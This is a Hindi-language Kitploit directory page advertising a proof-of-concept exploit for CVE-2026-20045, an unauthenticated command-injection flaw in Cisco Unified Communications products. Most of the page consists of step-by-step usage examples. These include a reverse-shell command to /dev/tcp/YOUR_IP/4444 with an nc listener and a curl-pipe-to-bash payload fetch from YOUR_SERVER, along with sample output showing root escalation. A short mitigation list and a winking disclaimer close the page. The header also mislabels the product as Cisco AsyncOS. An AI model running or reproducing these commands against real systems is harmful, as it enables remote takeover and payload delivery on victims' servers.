Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

CVE-2026-20045 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cisco Unified Communications उत्पादों में एक गंभीर बिना प्रमाणीकरण वाला RCE है, जो कमांड इंजेक्शन और रूट एस्केलेशन के साथ रिवर्स शेल को सक्षम बनाता है।

रिपॉजिटरी देखें
637 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2026-20045 — ज़ीरो-डे विश्लेषण 🚨

Cisco AsyncOS 0-Day Vulnerability

🧨 यह क्या है

एक गंभीर रिमोट कोड एक्ज़ीक्यूशन (RCE) कमज़ोरियाँ जो कई Cisco Unified Communications उत्पादों को प्रभावित करती है। पैच जारी होने से पहले इसका वास्तविक दुनिया में सक्रिय रूप से शोषण किया गया था।


🔥 यह खतरनाक क्यों है

  • 🚫 कोई प्रमाणीकरण आवश्यक नहीं
  • 🖥️ रिमोट कोड एक्ज़ीक्यूशन
  • 👑 संभावित रूट-स्तरीय पहुंच
  • 🌍 वास्तविक दुनिया में शोषण की पुष्टि

इसका मतलब है कि एक हमलावर प्रभावित सिस्टम को दूर से पूरी तरह अपने कब्जे में ले सकता है।


🚨 CVE-2026-20045.py के लिए उपयोग उदाहरण

यहाँ PoC स्क्रिप्ट चलाने के लिए उपयोग उदाहरणों के साथ एक सुधारित गाइड है, जिसमें ठीक वही शामिल है जो आप अपने टर्मिनल में देखेंगे यदि शोषण किसी कमज़ोर Cisco Unified Communications लक्ष्य (अनपैच्ड वेब इंटरफ़ेस उजागर) पर सफल होता है। मैंने बेहतर पठनीयता के लिए इमोजी, रंगीन कोड ब्लॉक (मार्कडाउन के माध्यम से), और संरचित अनुभाग जोड़े हैं। 😎

1.

बेसिक सिस्टम जानकारी परीक्षण

यह उपयोगकर्ता ID, उपयोगकर्ता नाम, और सिस्टम विवरण प्राप्त करने के लिए सरल कमांड चलाता है।

कमांड:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

यदि यह काम करता है तो आप क्या देखेंगे (सफल आउटपुट):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Initial command: id && whoami && uname -a  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  

[+] Possible command output:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 मुख्य संकेत: हरे [+] संकेतक, HTTP 200 स्थिति, और आउटपुट ब्लॉक में कमांड परिणाम। यदि कोई आउटपुट नहीं दिखता लेकिन स्थिति 200 है, तो यह अभी भी चुपचाप काम कर गया!

2. रिवर्स शेल सेटअप

यह आपकी मशीन पर एक इंटरैक्टिव शेल वापस खोलता है। पहले, एक लिसनर शुरू करें: nc -lvnp 4444।

कमांड:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

यदि यह काम करता है तो आप क्या देखेंगे (स्क्रिप्ट टर्मिनल में):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

लिसनर (nc) टर्मिनल में आप क्या देखेंगे:

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 मुख्य संकेत: स्क्रिप्ट सफलता संदेश दिखाती है; लिसनर को तुरंत रूट शेल प्रॉम्प्ट मिलता है। वहां इंटरैक्ट करने के लिए कमांड टाइप करें!

3. फ़ाइल डाउनलोड और एक्ज़ीक्यूट (जैसे, कस्टम पेलोड)

यह आपके सर्वर से एक स्क्रिप्ट डाउनलोड और चलाता है।

कमांड:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

यदि यह काम करता है तो आप क्या देखेंगे (सफल आउटपुट):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

📥 मुख्य संकेत: 200 स्थिति कोड; लक्ष्य पर सत्यापित करें (जैसे, लॉग/फ़ाइलें जांचें) या अपने सर्वर पर (डाउनलोड लॉग)। यदि पेलोड चुप है तो कोई सीधा आउटपुट नहीं।

💡 प्रो टिप्स:

  • नेटवर्क विशेषाधिकारों के लिए आवश्यक होने पर sudo के साथ चलाएं।
  • HTTPS लक्ष्यों का उपयोग करें; स्क्रिप्ट सेल्फ-साइन्ड सर्टिफिकेट संभालती है।
  • यदि यह विफल होता है (जैसे, 404/403), अन्य पथ आज़माएं या जांचें कि लक्ष्य पैच किया गया है या नहीं।
  • हमेशा नैतिक रूप से परीक्षण करें! 😈

🧩 प्रभावित उत्पाद

  • ☎️ Cisco Unified Communications Manager (Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition (SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 मूल कारण

HTTP प्रबंधन इंटरफ़ेस में उपयोगकर्ता-आपूर्ति इनपुट का अनुचित सत्यापन, जो कमांड इंजेक्शन की अनुमति देता है जो रिमोट कोड एक्ज़ीक्यूशन की ओर ले जाता है।


📊 गंभीरता

  • CVSS स्कोर: 8.2 (उच्च)
  • व्यावसायिक प्रभाव: गंभीर

🛡️ शमन और बचाव

  • ⚡ Cisco पैच तुरंत लागू करें
  • 🔒 प्रबंधन इंटरफ़ेस तक पहुंच प्रतिबंधित करें
  • 🌐 सिस्टम को सीधे इंटरनेट पर उजागर करने से बचें
  • 👀 संदिग्ध HTTP गतिविधि के लिए लॉग की निगरानी करें
  • 🏛️ लागू होने पर सरकारी कमज़ोरी सुधार मार्गदर्शन का पालन करें

🔒 अस्वीकरण:

सभी PoC कोड केवल अधिकृत सिस्टम पर नैतिक, शैक्षिक उपयोग के लिए हैं। अनधिकृत शोषण अवैध है; दुरुपयोग के लिए कोई दायित्व नहीं लिया जाता है। 😈

टूल डाउनलोड करें